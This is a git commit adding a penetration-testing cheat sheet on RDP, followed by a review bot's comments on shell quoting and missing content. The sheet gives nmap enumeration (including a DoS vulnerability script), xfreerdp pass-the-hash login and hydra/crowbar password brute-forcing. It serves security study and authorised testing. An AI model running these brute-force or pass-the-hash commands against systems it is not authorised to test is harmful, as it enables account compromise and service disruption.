Signed-off-by: Hadi <hadi@example.com>
Hadi
2026-05-04 14:17:54 +02:00
parent b4b755b608
commit c314445219
+46
@@ -0,0 +1,46 @@
---
title: "RDP"
description: "Enumeration, exploitation and post-exploitation techniques for RDP servers."
tags: ["rdp", "network", "service"]
publishDate: 2026-05-04
---
## Overview
RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session.
Common on Windows servers and workstations.
## Enumeration
### Banner grabbing
```bash
nmap -sV -p 3389 $IP
nmap -p 3389 --script rdp-* $IP
```
Key scripts:
- `rdp-enum-encryption`: checks encryption level
- `rdp-vuln-ms12-020`: tests for MS12-020 DoS vulnerability
## Connect
```bash
xfreerdp /u:$user /p:$password /v:$IP
xfreerdp /u:$user /p:$password /v:$IP /cert:ignore
rdesktop $IP
```
Pass the hash directly (no plaintext password needed):
```bash
xfreerdp /u:$user /pth:$hash /v:$IP
```
## Brute Force
```bash
hydra -l $user -P ~/wordlists/rockyou.txt rdp://$IP
crowbar -b rdp -s $IP/32 -u $user -C ~/wordlists/rockyou.txt
```
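Review bot: In the Enumeration block, `--script rdp-*` is unquoted, so the shell can expand the glob against files in the working directory before nmap receives it; write it as `--script "rdp-*"`. That wildcard also selects `rdp-vuln-ms12-020`, which the list just below describes as a DoS test, so the text should say that the second command runs it. The variables `$user`, `$password`, `$hash` and `$IP` are unquoted in every block and will split or glob on values containing spaces or shell metacharacters; double-quote them. In the Connect block, `/cert:ignore` appears with no explanation: add a sentence stating that it skips server certificate validation, so the reader knows the session is then open to interception. Finally, the front-matter description promises post-exploitation techniques, but the file contains only Overview, Enumeration, Connect and Brute Force; either trim the description or add the missing section.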